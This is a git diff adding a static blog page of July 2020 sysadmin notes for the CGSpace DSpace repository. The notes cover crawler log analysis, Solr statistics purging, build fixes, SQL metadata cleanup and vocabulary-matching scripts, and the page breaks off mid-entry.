+</code></pre><ul>
+<li>I see that all items with &ldquo;COVID19&rdquo; already have &ldquo;CORONAVIRUS DISEASE&rdquo; so I don&rsquo;t need to do anything</li>
+</ul>
+<!-- raw HTML omitted -->
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2020-07/index.html b/docs/2020-07/index.html
new file mode 100644
index 000000000..aee084534
--- /dev/null
+++ b/docs/2020-07/index.html
@@ -0,0 +1,1196 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="July, 2020" />
+<meta property="og:description" content="2020-07-01
+
+A few users noticed that CGSpace wasn&rsquo;t loading items today, item pages seem blank
+
+I looked at the PostgreSQL locks but they don&rsquo;t seem unusual
+I guess this is the same &ldquo;blank item page&rdquo; issue that we had a few times in 2019 that we never solved
+I restarted Tomcat and PostgreSQL and the issue was gone
+
+
+Since I was restarting Tomcat anyways I decided to redeploy the latest changes from the 5_x-prod branch and I added a note about COVID-19 items to the CGSpace frontpage at Peter&rsquo;s request
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2020-07/" />
+<meta property="article:published_time" content="2020-07-01T10:53:54+03:00" />
+<meta property="article:modified_time" content="2020-08-02T22:14:16+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="July, 2020"/>
+<meta name="twitter:description" content="2020-07-01
+
+A few users noticed that CGSpace wasn&rsquo;t loading items today, item pages seem blank
+
+I looked at the PostgreSQL locks but they don&rsquo;t seem unusual
+I guess this is the same &ldquo;blank item page&rdquo; issue that we had a few times in 2019 that we never solved
+I restarted Tomcat and PostgreSQL and the issue was gone
+
+
+Since I was restarting Tomcat anyways I decided to redeploy the latest changes from the 5_x-prod branch and I added a note about COVID-19 items to the CGSpace frontpage at Peter&rsquo;s request
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "July, 2020",
+  "url": "https://alanorth.github.io/cgspace-notes/2020-07/",
+  "wordCount": "5618",
+  "datePublished": "2020-07-01T10:53:54+03:00",
+  "dateModified": "2020-08-02T22:14:16+03:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2020-07/">
+
+    <title>July, 2020 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2020-07/">July, 2020</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2020-07-01T10:53:54+03:00">Wed Jul 01, 2020</time>
+ in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2020-07-01">2020-07-01</h2>
+<ul>
+<li>A few users noticed that CGSpace wasn&rsquo;t loading items today, item pages seem blank
+<ul>
+<li>I looked at the PostgreSQL locks but they don&rsquo;t seem unusual</li>
+<li>I guess this is the same &ldquo;blank item page&rdquo; issue that we had a few times in 2019 that we never solved</li>
+<li>I restarted Tomcat and PostgreSQL and the issue was gone</li>
+</ul>
+</li>
+<li>Since I was restarting Tomcat anyways I decided to redeploy the latest changes from the <code>5_x-prod</code> branch and I added a note about COVID-19 items to the CGSpace frontpage at Peter&rsquo;s request</li>
+</ul>
+<ul>
+<li>Also, Linode is alerting that we had high outbound traffic rate early this morning around midnight AND high CPU load later in the morning</li>
+<li>First looking at the traffic in the morning:</li>
+</ul>
+<pre tabindex="0"><code># cat /var/log/nginx/*.log.1 /var/log/nginx/*.log | grep -E &#34;01/Jul/2020:(00|01|02|03|04)&#34; | goaccess --log-format=COMBINED -
+...
+9659 33.56%    1  0.08% 340.94 MiB 64.39.99.13
+3317 11.53%    1  0.08% 871.71 MiB 199.47.87.140
+2986 10.38%    1  0.08%  17.39 MiB 199.47.87.144
+2286  7.94%    1  0.08%  13.04 MiB 199.47.87.142
+</code></pre><ul>
+<li>64.39.99.13 belongs to Qualys, but I see they are using a normal desktop user agent:</li>
+</ul>
+<pre tabindex="0"><code>Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.1 Safari/605.1.15
+</code></pre><ul>
+<li>I will purge hits from that IP from Solr</li>
+<li>The 199.47.87.x IPs belong to Turnitin, and apparently they are NOT marked as bots and we have 40,000 hits from them in 2020 statistics alone:</li>
+</ul>
+<pre tabindex="0"><code>$ curl -s &#34;http://localhost:8081/solr/statistics/select&#34; -d &#34;q=userAgent:/Turnitin.*/&amp;rows=0&#34; | grep -oE &#39;numFound=&#34;[0-9]+&#34;&#39;
+numFound=&#34;41694&#34;
+</code></pre><ul>
+<li>They used to be &ldquo;TurnitinBot&rdquo;&hellip; hhmmmm, seems they use both: <a href="https://turnitin.com/robot/crawlerinfo.html">https://turnitin.com/robot/crawlerinfo.html</a></li>
+<li>I will add Turnitin to the DSpace bot user agent list, but I see they are reqesting <code>robots.txt</code> and only requesting item pages, so that&rsquo;s impressive! I don&rsquo;t need to add them to the &ldquo;bad bot&rdquo; rate limit list in nginx</li>
+<li>While looking at the logs I noticed eighty-one IPs in the range 185.152.250.x making little requests this user agent:</li>
+</ul>
+<pre tabindex="0"><code>Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:76.0) Gecko/20100101 Firefox/76.0
+</code></pre><ul>
+<li>The IPs all belong to HostRoyale:</li>
+</ul>
+<pre tabindex="0"><code># cat /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep &#39;01/Jul/2020&#39; | awk &#39;{print $1}&#39; | grep 185.152.250. | sort | uniq | wc -l
+81
+# cat /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep &#39;01/Jul/2020&#39; | awk &#39;{print $1}&#39; | grep 185.152.250. | sort | uniq | sort -h
+185.152.250.1
+185.152.250.101
+185.152.250.103
+185.152.250.105
+185.152.250.107
+185.152.250.111
+185.152.250.115
+185.152.250.119
+185.152.250.121
+185.152.250.123
+185.152.250.125
+185.152.250.129
+185.152.250.13
+185.152.250.131
+185.152.250.133
+185.152.250.135
+185.152.250.137
+185.152.250.141
+185.152.250.145
+185.152.250.149
+185.152.250.153
+185.152.250.155
+185.152.250.157
+185.152.250.159
+185.152.250.161
+185.152.250.163
+185.152.250.165
+185.152.250.167
+185.152.250.17
+185.152.250.171
+185.152.250.183
+185.152.250.189
+185.152.250.191
+185.152.250.197
+185.152.250.201
+185.152.250.205
+185.152.250.209
+185.152.250.21
+185.152.250.213
+185.152.250.217
+185.152.250.219
+185.152.250.221
+185.152.250.223
+185.152.250.225
+185.152.250.227
+185.152.250.229
+185.152.250.231
+185.152.250.233
+185.152.250.235
+185.152.250.239
+185.152.250.243
+185.152.250.247
+185.152.250.249
+185.152.250.25
+185.152.250.251
+185.152.250.253
+185.152.250.255
+185.152.250.27
+185.152.250.29
+185.152.250.3
+185.152.250.31
+185.152.250.39
+185.152.250.41
+185.152.250.47
+185.152.250.5
+185.152.250.59
+185.152.250.63
+185.152.250.65
+185.152.250.67
+185.152.250.7
+185.152.250.71
+185.152.250.73
+185.152.250.77
+185.152.250.81
+185.152.250.85
+185.152.250.89
+185.152.250.9
+185.152.250.93
+185.152.250.95
+185.152.250.97
+185.152.250.99
+</code></pre><ul>
+<li>It&rsquo;s only a few hundred requests each, but I am very suspicious so I will record it here and purge their IPs from Solr</li>
+<li>Then I see 185.187.30.14 and 185.187.30.13 making requests also, with several different &ldquo;normal&rdquo; user agents
+<ul>
+<li>They are both apparently in France, belonging to Scalair FR hosting</li>
+<li>I will purge their requests from Solr too</li>
+</ul>
+</li>
+<li>Now I see some other new bots I hadn&rsquo;t noticed before:
+<ul>
+<li><code>Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) LinkCheck by Siteimprove.com</code></li>
+<li><code>Consilio (WebHare Platform 4.28.2-dev); LinkChecker)</code>, which appears to be a <a href="https://www.utwente.nl/en/websites/webhare/">university CMS</a></li>
+<li>I will add <code>LinkCheck</code>, <code>Consilio</code>, and <code>WebHare</code> to the list of DSpace bot agents and purge them from Solr stats</li>
+<li>COUNTER-Robots list already has <code>link.?check</code> but for some reason DSpace didn&rsquo;t match that and I see hits for some of these&hellip;</li>
+<li>Maybe I should add <code>[Ll]ink.?[Cc]heck.?</code> to a custom list for now?</li>
+<li>For now I added <code>Turnitin</code> to the <a href="https://github.com/atmire/COUNTER-Robots/pull/34">new bots pull request on COUNTER-Robots</a></li>
+</ul>
+</li>
+<li>I purged 20,000 hits from IPs and 45,000 hits from user agents</li>
+<li>I will revert the default &ldquo;example&rdquo; agents file back to the upstream master branch of COUNTER-Robots, and then add all my custom ones that are pending in pull requests they haven&rsquo;t merged yet:</li>
+</ul>
+<pre tabindex="0"><code>$ diff --unchanged-line-format= --old-line-format= --new-line-format=&#39;%L&#39; dspace/config/spiders/agents/example ~/src/git/COUNTER-Robots/COUNTER_Robots_list.txt
+Citoid
+ecointernet
+GigablastOpenSource
+Jersey\/\d
+MarcEdit
+OgScrper
+okhttp
+^Pattern\/\d
+ReactorNetty\/\d
+sqlmap
+Typhoeus
+7siters
+</code></pre><ul>
+<li>Just a note that I <em>still</em> can&rsquo;t deploy the <code>6_x-dev-atmire-modules</code> branch as it fails at ant update:</li>
+</ul>
+<pre tabindex="0"><code>     [java] java.lang.RuntimeException: Failed to startup the DSpace Service Manager: failure starting up spring service manager: Error creating bean with name &#39;DefaultStorageUpdateConfig&#39;: Injection of autowired dependencies failed; nested exception is org.springframework.beans.factory.BeanCreationException: Could not autowire method: public void com.atmire.statistics.util.StorageReportsUpdater.setStorageReportServices(java.util.List); nested exception is org.springframework.beans.factory.BeanCreationException: Error creating bean with name &#39;cuaEPersonStorageReportService&#39;: Injection of autowired dependencies failed; nested exception is org.springframework.beans.factory.BeanCreationException: Could not autowire field: private com.atmire.dspace.cua.dao.storage.CUAEPersonStorageReportDAO com.atmire.dspace.cua.CUAStorageReportServiceImpl$CUAEPersonStorageReportServiceImpl.CUAEPersonStorageReportDAO; nested exception is org.springframework.beans.factory.NoUniqueBeanDefinitionException: No qualifying bean of type [com.atmire.dspace.cua.dao.storage.CUAEPersonStorageReportDAO] is defined: expected single matching bean but found 2: com.atmire.dspace.cua.dao.impl.CUAStorageReportDAOImpl$CUAEPersonStorageReportDAOImpl#0,com.atmire.dspace.cua.dao.impl.CUAStorageReportDAOImpl$CUAEPersonStorageReportDAOImpl#1
+</code></pre><ul>
+<li>I had told Atmire about this several weeks ago&hellip; but I reminded them again in the ticket
+<ul>
+<li>Atmire says they are able to build fine, so I tried again and noticed that I had been building with <code>-Denv=dspacetest.cgiar.org</code>, which is not necessary for DSpace 6 of course</li>
+<li>Once I removed that it builds fine</li>
+</ul>
+</li>
+<li>I quickly re-applied the Font Awesome 5 changes to use SVG+JS instead of web fonts (from 2020-04) and things are looking good!</li>
+<li>Run all system updates on DSpace Test (linode26), deploy latest <code>6_x-dev-atmire-modules</code> branch, and reboot it</li>
+</ul>
+<h2 id="2020-07-02">2020-07-02</h2>
+<ul>
+<li>I need to export some Solr statistics data from CGSpace to test Salem&rsquo;s modifications to the dspace-statistics-api
+<ul>
+<li>He modified it to query Solr on the fly instead of indexing it, which will be heavier and slower, but allows us to get more granular stats and countries/cities</li>
+<li>Because have so many records I want to use solr-import-export-json to get several months at a time with a date range, but it seems there are first issues with curl (need to disable globbing with <code>-g</code> and URL encode the range)</li>
+<li>For reference, the <a href="https://lucene.apache.org/solr/4_10_2/solr-core/org/apache/solr/schema/DateField.html">Solr 4.10.x DateField docs</a></li>
+<li>This range works in Solr UI: <code>[2019-01-01T00:00:00Z TO 2019-06-30T23:59:59Z]</code></li>
+<li>As well in curl:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ curl -g -s &#39;http://localhost:8081/solr/statistics-2019/select?q=*:*&amp;fq=time:%5B2019-01-01T00%3A00%3A00Z%20TO%202019-06-30T23%3A59%3A59Z%5D&amp;rows=0&amp;wt=json&amp;indent=true&#39;
+{
+  &#34;responseHeader&#34;:{
+    &#34;status&#34;:0,
+    &#34;QTime&#34;:0,
+    &#34;params&#34;:{
+      &#34;q&#34;:&#34;*:*&#34;,
+      &#34;indent&#34;:&#34;true&#34;,
+      &#34;fq&#34;:&#34;time:[2019-01-01T00:00:00Z TO 2019-06-30T23:59:59Z]&#34;,
+      &#34;rows&#34;:&#34;0&#34;,
+      &#34;wt&#34;:&#34;json&#34;}},
+  &#34;response&#34;:{&#34;numFound&#34;:7784285,&#34;start&#34;:0,&#34;docs&#34;:[]
+  }}
+</code></pre><ul>
+<li>But not in solr-import-export-json&hellip; hmmm&hellip; seems we need to URL encode <em>only</em> the date range itself, but not the brackets:</li>
+</ul>
+<pre tabindex="0"><code>$ ./run.sh -s http://localhost:8081/solr/statistics-2019 -a export -o /tmp/statistics-2019-1.json -f &#39;time:%5B2019-01-01T00%3A00%3A00Z%20TO%202019-06-30T23%3A59%3A59Z]&#39; -k uid
+$ zstd /tmp/statistics-2019-1.json
+</code></pre><ul>
+<li>Then import it on my local dev environment:</li>
+</ul>
+<pre tabindex="0"><code>$ zstd -d statistics-2019-1.json.zst
+$ ./run.sh -s http://localhost:8080/solr/statistics -a import -o ~/Downloads/statistics-2019-1.json -k uid
+</code></pre><h2 id="2020-07-05">2020-07-05</h2>
+<ul>
+<li>Import twelve items into the <a href="https://hdl.handle.net/10568/97076">CRP Livestock multimedia</a> collection for Peter Ballantyne
+<ul>
+<li>I ran the data through csv-metadata-quality first to validate and fix some common mistakes</li>
+<li>Interesting to check the data with <code>csvstat</code> to see if there are any duplicates</li>
+</ul>
+</li>
+<li>Peter recently asked me to add Target audience (<code>cg.targetaudience</code>) to the CGSpace sidebar facets and AReS filters
+<ul>
+<li>I added it on my local DSpace test instance, but I&rsquo;m waiting for him to tell me what he wants the header to be &ldquo;Audiences&rdquo; or &ldquo;Target audience&rdquo; etc&hellip;</li>
+</ul>
+</li>
+<li>Peter also asked me to increase the size of links in the CGSpace &ldquo;Welcome&rdquo; text
+<ul>
+<li>I suggested using the CSS <code>font-size: larger</code> property to just bump it up one relative to what it already is</li>
+<li>He said it looks good, but that actually now the links seem OK (I told him to refresh, as I had made them bold a few days ago) so we don&rsquo;t need to adjust it actually</li>
+</ul>
+</li>
+<li>Mohammed Salem modified my <a href="https://github.com/ilri/dspace-statistics-api">dspace-statistics-api</a> to query Solr directly so I started writing a script to benchmark it today
+<ul>
+<li>I will monitor the JVM memory and CPU usage in visualvm, just like I did in 2019-04</li>
+<li>I noticed an issue with his limit parameter so I sent him some feedback on that in the meantime</li>
+</ul>
+</li>
+<li>I noticed that we have 20,000 distinct values for <code>dc.subject</code>, but there are at least 500 that are lower or mixed case that we should simply uppercase without further thought:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# UPDATE metadatavalue SET text_value=UPPER(text_value) WHERE resource_type_id=2 AND metadata_field_id=57 AND text_value ~ &#39;[[:lower:]]&#39;;
+</code></pre><ul>
+<li>DSpace Test needs a different query because it is running DSpace 6 with UUIDs for everything:</li>
+</ul>
+<pre tabindex="0"><code>dspace63=# UPDATE metadatavalue SET text_value=UPPER(text_value) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=57 AND text_value ~ &#39;[[:lower:]]&#39;;
+</code></pre><ul>
+<li>Note the use of the POSIX character class :)</li>
+<li>I suggest that we generate a list of the top 5,000 values that don&rsquo;t match AGROVOC so that Sisay can correct them
+<ul>
+<li>Start by getting the top 6,500 subjects (assuming that the top ~1,500 are valid from our previous work):</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value, count(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=57 GROUP BY text_value ORDER BY count DESC) TO /tmp/2020-07-05-subjects.csv WITH CSV;
+COPY 19640
+dspace=# \q
+$ csvcut -c1 /tmp/2020-07-05-subjects-upper.csv | head -n 6500 &gt; 2020-07-05-cgspace-subjects.txt
+</code></pre><ul>
+<li>Then start looking them up using <code>agrovoc-lookup.py</code>:</li>
+</ul>
+<pre tabindex="0"><code>$ ./agrovoc-lookup.py -i 2020-07-05-cgspace-subjects.txt -om 2020-07-05-cgspace-subjects-matched.txt -or 2020-07-05-cgspace-subjects-rejected.txt -d
+</code></pre><h2 id="2020-07-06">2020-07-06</h2>
+<ul>
+<li>I made some optimizations to the suite of Python utility scripts in our DSpace directory as well as the <a href="https://github.com/ilri/csv-metadata-quality">csv-metadata-quality</a> script
+<ul>
+<li>Mostly to make more efficient usage of the requests cache and to use parameterized requests instead of building the request URL by concatenating the URL with query parameters</li>
+</ul>
+</li>
+<li>I modified the <code>agrovoc-lookup.py</code> script to save its results as a CSV, with the subject, language, type of match (preferred, alternate, and total number of matches) rather than save two separate files
+<ul>
+<li>Note that I see <code>prefLabel</code>, <code>matchedPrefLabel</code>, and <code>altLabel</code> in the REST API responses and I&rsquo;m not sure what the second one means</li>
+<li>I emailed FAO&rsquo;s AGROVOC contact to ask them</li>
+<li>They responded to say that <code>matchedPrefLabel</code> is not a property in SKOS/SKOSXL vocabulary, but their SKOSMOS system seems to use it to hint that the search terms matched a <code>prefLabel</code> in another language</li>
+<li>I will treat the <code>matchedPrefLabel</code> values as if they were <code>prefLabel</code> values for the indicated language then</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-07-07">2020-07-07</h2>
+<ul>
+<li>Peter asked me to send him a list of sponsors on CGSpace</li>
+</ul>
+<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value as &#34;dc.description.sponsorship&#34;, count(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=29 GROUP BY &#34;dc.description.sponsorship&#34; ORDER BY count DESC) TO /tmp/2020-07-07-sponsors.csv WITH CSV HEADER;
+COPY 707
+</code></pre><ul>
+<li>I ran it quickly through my <code>csv-metadata-quality</code> tool and found two issues that I will correct with <code>fix-metadata-values.py</code> on CGSpace immediately:</li>
+</ul>
+<pre tabindex="0"><code>$ cat 2020-07-07-fix-sponsors.csv
+dc.description.sponsorship,correct
+&#34;Ministe`re des Affaires Etrange`res et Européennes, France&#34;,&#34;Ministère des Affaires Étrangères et Européennes, France&#34;
+&#34;Global Food Security Programme,  United Kingdom&#34;,&#34;Global Food Security Programme, United Kingdom&#34;
+$ ./fix-metadata-values.py -i 2020-07-07-fix-sponsors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.description.sponsorship -t correct -m 29
+</code></pre><ul>
+<li>Upload the Capacity Development July newsletter to CGSpace for Ben Hack because Abenet and Bizu usually do it, but they are currently offline due to the Internet being turned off in Ethiopia
+<ul>
+<li>Here: <a href="https://hdl.handle.net/10568/108708">https://hdl.handle.net/10568/108708</a></li>
+</ul>
+</li>
+<li>I implemented the Dimensions.ai badge on DSpace Test for Peter to see, as he&rsquo;s been asking me for awhile:</li>
+</ul>
+<p><img src="/cgspace-notes/2020/07/dimensions-badge.png" alt="Dimensions.ai badge"></p>
+<ul>
+<li>It was easy once I figured out how to do the XSLT in the DSpace theme (need to get the DOI link and remove the &ldquo;<a href="https://doi.org/%22">https://doi.org/&quot;</a> from the string)
+<ul>
+<li>Actually this raised an issue that the Altmetric badges weren&rsquo;t enabled in our DSpace 6 branch yet because I had forgotten to copy the config</li>
+<li>Also, I noticed a big issue in both our DSpace 5 and DSpace 6 branches related to the <code>$identifier_doi</code> variable being defined incorrectly and thus never getting set (has to do with DRI)</li>
+<li>I fixed both and now the Altmetric badge and the Dimensions badge both appear&hellip; nice</li>
+</ul>
+</li>
+</ul>
+<p><img src="/cgspace-notes/2020/07/dimensions-badge2.png" alt="Altmetric and Dimensions.ai badge"></p>
+<h2 id="2020-07-08">2020-07-08</h2>
+<ul>
+<li>Generate a CSV of all the AGROVOC subjects that didn&rsquo;t match from the top 6500 I exported earlier this week:</li>
+</ul>
+<pre tabindex="0"><code>$ csvgrep -c &#39;number of matches&#39; -r &#34;^0$&#34; 2020-07-05-cgspace-subjects.csv | csvcut -c 1 &gt; 2020-07-05-cgspace-invalid-subjects.csv
+</code></pre><ul>
+<li>Yesterday Gabriela from CIP emailed to say that she was removing the accents from her authors&rsquo; names because of &ldquo;funny character&rdquo; issues with reports generated from CGSpace
+<ul>
+<li>I told her that it&rsquo;s probably her Windows / Excel that is messing up the data, and she figured out how to open them correctly!</li>
+<li>Now she says she doesn&rsquo;t want to remove the accents after all and she sent me a new list of corrections</li>
+<li>I used csvgrep and found a few where she is still removing accents:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ csvgrep -c 2 -r &#34;^.+$&#34; ~/Downloads/cip-authors-GH-20200706.csv | csvgrep -c 1 -r &#34;^.*[À-ú].*$&#34; | csvgrep -c 2 -r &#34;^.*[À-ú].*$&#34; -i | csvcut -c 1,2
+dc.contributor.author,correction
+&#34;López, G.&#34;,&#34;Lopez, G.&#34;
+&#34;Gómez, R.&#34;,&#34;Gomez, R.&#34;
+&#34;García, M.&#34;,&#34;Garcia, M.&#34;
+&#34;Mejía, A.&#34;,&#34;Mejia, A.&#34;
+&#34;Quiróz, Roberto A.&#34;,&#34;Quiroz, R.&#34;
+</code></pre><ul>
+<li>
+<p>csvgrep from the csvkit suite is <em>so cool</em>:</p>
+<ul>
+<li>Select lines with column two (the correction) having a value</li>
+<li>Select lines with column one (the original author name) having an accent / diacritic</li>
+<li>Select lines with column two (the correction) NOT having an accent (ie, she&rsquo;s not removing an accent)</li>
+<li>Select columns one and two</li>
+</ul>
+</li>
+<li>
+<p>Peter said he liked the work I didn on the badges yesterday so I put some finishing touches on it to detect more DOI URI styles and pushed it to the <code>5_x-prod</code> branch</p>
+<ul>
+<li>I will port it to DSpace 6 soon</li>
+</ul>
+</li>
+</ul>
+<p><img src="/cgspace-notes/2020/07/altmetrics-dimensions-badges.png" alt="Altmetric and Dimensions badges"></p>
+<ul>
+<li>I wrote a quick script to lookup organizations (affiliations) in the Research Organization Repository (ROR) JSON data release v5
+<ul>
+<li>I want to use this to evaluate ROR as a controlled vocabulary for CGSpace and MELSpace</li>
+<li>I exported a list of affiliations from CGSpace:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value as &#34;cg.contributor.affiliation&#34;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-07-08-affiliations.csv WITH CSV HEADER;
+</code></pre><ul>
+<li>Then I stripped the CSV header and quotes to make it a plain text file and ran <code>ror-lookup.py</code>:</li>
+</ul>
+<pre tabindex="0"><code>$ ./ror-lookup.py -i /tmp/2020-07-08-affiliations.txt -r ror.json -o 2020-07-08-affiliations-ror.csv -d
+$ wc -l /tmp/2020-07-08-affiliations.txt 
+5866 /tmp/2020-07-08-affiliations.txt
+$ csvgrep -c matched -m true 2020-07-08-affiliations-ror.csv | wc -l 
+1406
+$ csvgrep -c matched -m false 2020-07-08-affiliations-ror.csv | wc -l
+4462
+</code></pre><ul>
+<li>So, minus the CSV header, we have 1405 case-insensitive matches out of 5866 (23.9%)</li>
+</ul>
+<h2 id="2020-07-09">2020-07-09</h2>
+<ul>
+<li>Atmire responded to the ticket about DSpace 6 and Solr yesterday
+<ul>
+<li>They said that the CUA issue is due to the &ldquo;unmigrated&rdquo; Solr records and that we should delete them</li>
+<li>I told them that <a href="https://wiki.lyrasis.org/display/DSDOC6x/SOLR+Statistics+Maintenance">the &ldquo;unmigrated&rdquo; IDs are a known issue in DSpace 6</a> and we should rather figure out why they are unmigrated</li>
+<li>I didn&rsquo;t see any discussion on the dspace-tech mailing list or on DSpace Jira about unmigrated IDs, so I sent a mail to the mailing list to ask</li>
+</ul>
+</li>
+<li>I updated <code>ror-lookup.py</code> to check aliases and acronyms as well and now the results are better for CGSpace&rsquo;s affiliation list:</li>
+</ul>
+<pre tabindex="0"><code>$ wc -l /tmp/2020-07-08-affiliations.txt 
+5866 /tmp/2020-07-08-affiliations.txt
+$ csvgrep -c matched -m true 2020-07-08-affiliations-ror.csv | wc -l 
+1516
+$ csvgrep -c matched -m false 2020-07-08-affiliations-ror.csv | wc -l
+4352
+</code></pre><ul>
+<li>So now our matching improves to 1515 out of 5866 (25.8%)</li>
+<li>Gabriela from CIP said that I should run the author corrections minus those that remove accent characters so I will run it on CGSpace:</li>
+</ul>
+<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2020-07-09-fix-90-cip-authors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.contributor.author -t correction -m 3
+</code></pre><ul>
+<li>Apply 110 fixes and 90 deletions to sponsorships that Peter sent me a few days ago:</li>
+</ul>
+<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2020-07-07-fix-110-sponsors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.description.sponsorship -t &#39;correct/action&#39; -m 29
+$ ./delete-metadata-values.py -i /tmp/2020-07-07-delete-90-sponsors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.description.sponsorship -m 29
+</code></pre><ul>
+<li>Start a full Discovery re-index on CGSpace:</li>
+</ul>
+<pre tabindex="0"><code>$ time chrt -b 0 dspace index-discovery -b
+
+real    94m21.413s
+user    9m40.364s
+sys     2m37.246s
+</code></pre><ul>
+<li>I modified <code>crossref-funders-lookup.py</code> to be case insensitive and now CGSpace&rsquo;s sponsors match 173 out of 534 (32.4%):</li>
+</ul>
+<pre tabindex="0"><code>$ ./crossref-funders-lookup.py -i 2020-07-09-cgspace-sponsors.txt -o 2020-07-09-cgspace-sponsors-crossref.csv -d -e a.orth@cgiar.org
+$ wc -l 2020-07-09-cgspace-sponsors.txt
+534 2020-07-09-cgspace-sponsors.txt
+$ csvgrep -c matched -m true 2020-07-09-cgspace-sponsors-crossref.csv | wc -l 
+174
+</code></pre><h2 id="2020-07-12">2020-07-12</h2>
+<ul>
+<li>On 2020-07-10 Macaroni Bros emailed to ask if there are issues with CGSpace because they are getting HTTP 504 on the REST API
+<ul>
+<li>First, I looked in Munin and I see high number of DSpace sessions and threads on Friday evening around midnight, though that was much later than his email:</li>
+</ul>
+</li>
+</ul>
+<p><img src="/cgspace-notes/2020/07/jmx_dspace_sessions-day.png" alt="DSpace sessions">
+<img src="/cgspace-notes/2020/07/threads-day.png" alt="Threads">
+<img src="/cgspace-notes/2020/07/postgres_locks_ALL-day.png" alt="PostgreSQL locks">
+<img src="/cgspace-notes/2020/07/postgres_transactions_ALL-day.png" alt="PostgreSQL transactions"></p>
+<ul>
